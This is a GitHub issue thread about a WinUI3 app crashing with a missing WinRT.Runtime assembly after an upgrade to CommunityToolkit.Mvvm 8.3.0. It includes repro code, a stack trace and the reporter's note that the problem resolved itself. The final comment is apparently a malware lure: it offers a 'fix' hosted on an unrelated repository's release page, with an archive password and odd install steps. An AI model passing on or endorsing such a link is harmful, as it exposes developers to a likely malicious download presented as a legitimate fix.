### ISSUE TITLE
WASDK projects crashes when updating to MVVM 8.3

### ISSUE THREAD

**Issue by Poker-sang** [CommunityToolkit/dotnet#925]
### Describe the bug

After upgrading the package to 8.3.0, the project can be successfully built, but XAML throws an exception: 
`System.IO.FileNotFoundException: Message = “Could not load file or assembly 'WinRT. Culture=neutral, PublicKeyToken=99ea127f02d97709'. The system could not find the specified file.”`
How do I fix this?

### Regression

8.2.2

### Steps to reproduce

1. Create a template WinUI3 project
2. Import `CommunityToolkit.MVVM` 8.3.0
3. Add any classes of MVVM to `XamlTypeInfo.g.cs`

e.g.

```cs
public sealed partial class MainWindow : Window
{
    public MainWindow() => InitializeComponent();

    public ObservableObject MyProperty { get; set; } = null;
}
```

```xml
<Button Content="{x:Bind MyProperty, Mode=OneWay}" />
```

### Expected behavior

Not crashed

### Screenshots

![image](https://github.com/user-attachments/assets/65904234-6434-4d24-acc5-f21fd4e4622a)

### IDE and version

VS 2022

### IDE version

17.11.2

### Nuget packages

- [ ] CommunityToolkit.Common
- [ ] CommunityToolkit.Diagnostics
- [ ] CommunityToolkit.HighPerformance
- [X] CommunityToolkit.Mvvm (aka MVVM Toolkit)

### Nuget package version(s)

8.3.0

### Additional context

```
System.TypeInitializationException: The type initializer for '<Module>' threw an exception.
   在 App1.App1_XamlTypeInfo.XamlTypeInfoProvider.InitTypeTables() 在 C:\WorkSpace\App1\obj\x64\Debug\net8.0-windows10.0.22621.0\win-x64\XamlTypeInfo.g.cs 中: 第 252 行
   在 App1.App1_XamlTypeInfo.XamlTypeInfoProvider.LookupTypeIndexByName(String typeName) 在 C:\WorkSpace\App1\obj\x64\Debug\net8.0-windows10.0.22621.0\win-x64\XamlTypeInfo.g.cs 中: 第 258 行
   在 App1.App1_XamlTypeInfo.XamlTypeInfoProvider.GetXamlTypeByName(String typeName) 在 C:\WorkSpace\App1\obj\x64\Debug\net8.0-windows10.0.22621.0\win-x64\XamlTypeInfo.g.cs 中: 第 165 行
   在 App1.App1_XamlTypeInfo.XamlMetaDataProvider.GetXamlType(String fullName) 在 C:\WorkSpace\App1\obj\x64\Debug\net8.0-windows10.0.22621.0\win-x64\XamlTypeInfo.g.cs 中: 第 101 行
   在 App1.App.GetXamlType(String fullName) 在 C:\WorkSpace\App1\obj\x64\Debug\net8.0-windows10.0.22621.0\win-x64\XamlTypeInfo.g.cs 中: 第 49 行
   在 ABI.Microsoft.UI.Xaml.Markup.IXamlMetadataProvider.Do_Abi_GetXamlType_1(IntPtr thisPtr, IntPtr fullName, IntPtr* result)

Inner Exception:
System.IO.FileNotFoundException: Could not load file or assembly 'WinRT.Runtime, Version=2.1.0.0, Culture=neutral, PublicKeyToken=99ea127f02d97709'. 系统找不到指定的文件。
   在 WinRT.CommunityToolkit_MvvmGenericHelpers.GlobalVtableLookup.InitializeGlobalVtableLookup()
   在 .cctor()
```

### Help us help you

No, just wanted to report this

**Comment by Poker-sang** [comment]
Oh it is fixed. Sorry

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
